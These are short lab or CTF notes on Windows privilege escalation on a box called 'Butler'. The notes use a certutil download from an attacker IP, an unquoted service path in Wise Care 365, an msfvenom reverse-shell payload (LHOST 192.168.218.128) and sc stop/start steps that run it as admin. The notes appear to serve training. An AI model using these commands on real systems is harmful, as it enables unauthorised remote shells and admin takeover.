Butler

ls on windows is dir

moving file to windows:

certutil.exe -urlcache -f http://192.168.218.128/Wise.exe Wise.exe

Find privEsc with winPEAS

WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected
YOU CAN MODIFY THIS SERVICE: AllAccess
File Permissions: Administrators [AllAccess]
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\Wise\Wise Care 365 (Administrators [AllAccess])
In order to optimize system performance,Wise Care 365 will calculate your system startup time.

No quotes and space detected meaning:

windows will go thru the path and try: C:\Program.exe until it finds the exe. We can put Wise.exe inside \Wise\ as a payload!

Creating msfvenom payload:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.218.128 LPORT=7777 -f exe > Wise.exe

how to run it as root/admin?:

stop the WiseBootAssistant service:

sc stop WiseBootAssistant

then start it again:

sc start WiseBootAssistant